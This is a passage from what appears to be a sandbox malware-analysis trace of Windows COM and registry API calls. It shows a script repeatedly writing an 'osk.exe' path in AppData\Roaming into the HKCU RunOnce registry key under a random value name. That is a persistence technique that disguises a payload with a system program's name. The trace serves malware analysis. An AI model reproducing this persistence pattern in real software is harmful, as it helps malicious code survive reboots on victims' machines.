This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.610] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 [0081.610] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.610] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x41 [0081.610] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.611] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 [0081.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.611] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.611] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.611] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.611] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.611] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.612] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.612] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.612] RegCloseKey (hKey=0x280) returned 0x0 [0081.612] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.612] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.612] SetTimer (hWnd=0x20280, nIDEvent=0x20bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bc [0081.612] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.625] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.625] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.625] KillTimer (hWnd=0x20280, uIDEvent=0x20bc) returned 1 [0081.625] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.625] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.625] IUnknown:Release (This=0x787518) returned 0x1 [0081.625] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.625] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.625] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.626] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.626] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0081.626] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.626] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x42 [0081.626] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.627] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0081.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.627] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.627] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.627] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.627] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.627] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.627] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.628] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.628] RegCloseKey (hKey=0x280) returned 0x0 [0081.628] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.628] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.628] SetTimer (hWnd=0x20280, nIDEvent=0x20bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bd [0081.628] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.640] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.640] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.640] KillTimer (hWnd=0x20280, uIDEvent=0x20bd) returned 1 [0081.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.641] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0081.641] IUnknown:Release (This=0x787518) returned 0x1 [0081.641] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.641] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.641] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.641] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.641] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.641] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0081.641] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.641] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x43 [0081.641] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.642] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x42 [0081.642] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.642] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.642] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.642] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.642] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.642] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.643] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.643] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.643] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.643] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.643] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.643] RegCloseKey (hKey=0x280) returned 0x0 [0081.643] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.643] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.643] SetTimer (hWnd=0x20280, nIDEvent=0x20be, uElapse=0xa, lpTimerFunc=0x0) returned 0x20be [0081.643] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.656] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.656] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.656] KillTimer (hWnd=0x20280, uIDEvent=0x20be) returned 1 [0081.656] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.656] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.656] IUnknown:Release (This=0x787518) returned 0x1 [0081.657] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.657] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.657] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.657] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
